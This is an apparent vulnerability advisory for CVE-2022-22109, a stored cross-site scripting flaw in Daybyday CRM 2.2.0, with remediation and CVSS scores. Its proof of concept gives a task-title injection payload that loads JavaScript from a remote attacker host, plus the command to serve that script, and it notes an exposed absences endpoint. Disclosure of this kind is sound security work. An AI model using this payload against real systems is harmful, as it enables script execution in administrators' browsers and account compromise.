We found results for “”
CVE-2022-22109
Date: January 5, 2022
Overview
In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.Details
Daybyday CRM is affected by a stored XSS vulnerability that allows low privileged application users (having permission to create tasks) to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.PoC Details
For demonstration purposes we'll use 2 users:test@user.com (low privileged user)
admin@admin.com (administrator)
Login to the application as test@user.com, which has a role Employee and has permissions to create tasks.
Go to “New Task” from the left pane and create a new task. Inject the below payload in the Title field and click on Create Task button. The payload includes the attacker's remote machine from which they load javascript malicious code.
On the attacker’s machine, create a file called “test.js” with contents as given below.
Run a PHP server to host the “test.js” file.
Login as admin@admin.com and go to All Tasks from the left pane, and will notice that an alert pops up with content hosted on the PHP server.
Login with test@user.com. Add “/users/calendar-users” to the url, and the absences for all the users will be available in the returned JSON data.
PoC Code
// Payload
"></a><script type="text/javascript" src="http://192.168.18.40:9999/test.js"></script>
// “test.js” contents:
alert(“This proves my POC works :)”);
// Command to run the PHP server
php -S 192.168.18.40:9999
Affected Environments
bottelet/flarepoint - 2.2.0Prevention
Update to 2.2.1 in "bottelet/flarepoint" package, 2.2.1 in "Bottelet/DaybydayCRM" repo.Language: PHP
Good to know:
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Changed |
Confidentiality (C): | Low |
Integrity (I): | Low |
Availability (A): | None |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Medium |
Authentication (AU): | Single |
Confidentiality (C): | None |
Integrity (I): | Partial |
Availability (A): | None |
Additional information: |